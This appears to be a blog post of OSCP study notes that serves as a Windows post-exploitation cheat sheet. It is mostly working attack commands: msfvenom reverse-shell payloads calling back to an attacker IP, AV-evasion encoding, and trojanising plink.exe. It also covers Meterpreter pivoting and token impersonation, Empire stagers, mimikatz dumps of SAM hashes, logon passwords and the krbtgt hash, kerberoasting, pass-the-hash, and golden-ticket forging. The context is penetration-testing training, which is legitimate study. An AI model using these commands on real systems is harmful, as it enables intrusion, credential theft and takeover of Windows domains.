Certification

OSCP notes dump: #POSTEXPLOIT-WIN

Philipp Fragstein

4 min read
Photo by Emma Steinhobel / Unsplash

Attacking the Windows OS as a former Debian Administrator was quite a new challenge for me. However, it is important to dive into the field of Windows exploitation because it is the most used desktop OS worldwide. The following notes are about my OSCP prep for Windows.

metasploit framework 

# list all payloads from msfvenom
msfvenom -l payloads 

# basic reverse shell
# windows
msfvenom -p windows/reverse_tcp_shell LHOST=<ATTACKER-IP> LPORT=4444 -f exe -o evil.exe 

# linux
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.119.210 LPORT=7777 -f py -b "\x2
0\x00" -v shellcode

# shikata ga nai shell 
# with parameter “-f c" for c-like shellcode and 
# “EXITFUNC=..” for only exiting the thread and not crashing the whole service. 
# “-b” defines bad characters 

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.210 LPORT=443 EXITFUNC=thread -f c -e 
x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"

set autorunscript after shell execution
set AutoRunScript post/windows/manage/migrate

narrow-down search
search meterpreter type:payload

# injecting payload into existing PE
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

# generating payload from within msfconsole 
generate -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

# run module as background job
exploit -j

# list backgroundes jobs 
jobs

# attach backgrounded job 
jobs -i 0 

# kill job
kill 0 

# list executable formats
msfvenom -l formats

# shows additional options
show advanced

# encode staged payload // av evasion 
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai
exploit -j

# setting up an autorunscript
set AutoRunScript windows/gather/enum_logged_on_users

# changing communication protocol after initial compromiose 
transport list
transport add -t reverse_tcp -l 10.11.0.4 -p 5555
transport next

# loading modules (meterpreter)
load powershell

# dumping creds /requires “load kiwi”
creds_msv

# pivoting or adding route to session id // outside of meterpreter!
route add 192.168.1.0/24 11

# allowing other applications to tunnel through the pivot 
use auxiliary/server/socks4a
echo “socks4 127.0.0.1 8080” >> /etc/proxychains.conf
proxychains rdesktop 192.168.1.110

# list tickets
use incognito
list_tokens -u

# steal / impersonate available token
impersonate_token sandbox\\Administrator

empire framework

# The empire listener is waiting for a call-back. The stager is the payload the gets executed on the target. As a final step empires stager retrieves the agent call. 

# show active listeners // like multi-handler from metasploit
listeners

# list all available listeners
uselistener <tab><tab>

# set Host for module
set Host <HOST-IP>

# run listener
execute

# create stager
usestager windows/launcher_bat

# assign created listener 
set Listener http

# list available agents
agents

# interact with session
interact <session-name>

## agent usage

# list all available options
help

# show processes
ps

# migrate process
psinject http 3568

# use modules
usemodule <tab> <tab>

# module: situational awareness
usemodule situational_awareness/network/powerview/get_user

mimikatz/kiwi

# allowing mimikatz to tamper with other processes. Only possible with SYSTEM privs
mimikatz # privilege::debug

# trying to elevate the privilege to SYSTEM
mimikatz # token::elevate

# dumping windows password db (SAM - Security Account Manager)
lsadump::sam

# dump kerberos tickets
kerberos::list /export 

# print tickets
sekurlsa::tickets
(PS C:/> klist )

# print passwords
sekurlsa::logonpasswords

# purge kerberos tickets
purge::kerberos

# invoke cmd 
mis::cmd

kerberoasting

get-spn for an overview
requesting kerberoast ticket
cracking ticket that is encryptred with the password of the service account 

kerberoasting (Attack on Service Accounts)
1. Requesting TGS Ticket from KDC that includes the hashed password of the service account // SPN necessary 

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/CorpWebServer.corp.com'

2. Dumping ticket with mimikatz/kiwi in the context of a local administrator
mimikatz # privilege::debug
mimikatz # kerberos::list /export 

3. Cracking the hash with “tgsreocrack.py" alternative: hashcat or john 
python /usr/share/kerberoast/tgsrepcrack.py wordlist.txt 1-40a50000-Offsec@HTTP-CorpWebServer.corp.com-CORP.COM.kirbi

pass-the-hash (pth)

# passing the hash and getting rce
pth-winexe -U offsec%aad3b4YYYYYYYYYYYYYYYYYYYYYYYYYYYY5e //10.11.0.22 cmd

# overpassing the hash 
# The essence of the overpass the hash technique is to turn the NTLM hash into a Kerberos ticket and avoid the use of NTLM authentication. A simple way to do this is again with the sekurlsa::pth command from Mimikatz.
mimikatz # sekurlsa::pth /user:j_admin /domain:corp.com /ntlm:e2b47YYYYYYYYYYYYYYYYYY66c327 /run:PowerShell.exe
PS> net use \\dc01
PS> klist 
PS> .\PsExec.exe \\dc01 cmd.exe
# PsExec doesn't accept user hashed but tickets instead. Since we operate in the contect of the Admin we may reuse the TGT to obtain code execution on the domain controller.

silver tickets

Attack Synopsis:
• Attacker obtains the NTLM password hash of a Service Account (e.g. via. Kerberoasting)
• Using Mimikatz, the attacker creates a forged TGS Ticket (Silver Ticket) using the NTML hash of the Service Account.
• The attacker uses this ticket to access a specific service on the target host, bypassing any communictation with Active Directory DOmain Controlllers.
• The attacker is able to forge the Privileged Account Certificate (PAC) and other information as part of the Silver Ticket 
YT: stealthybits

selfmade TGT or golden tickets

# extractiing the krbtgt hash with mimikatz 
mimikatz # lsadump::lsa /patch 

# delete exisiting kerberos tickets
mimikatz # kerberos::purge

# injecting golden ticket into memory // can be performed even from computers that aren't to the domain 
kerberos::golden /user:fakeuser /domain:corp.com /sid:S-1-5-21-1234324243243243-2342432432 /krbtgt:7234324324245322355325325265 /ptt

conduct leteral movement 
psexec.exe \\dc01 cmd.exe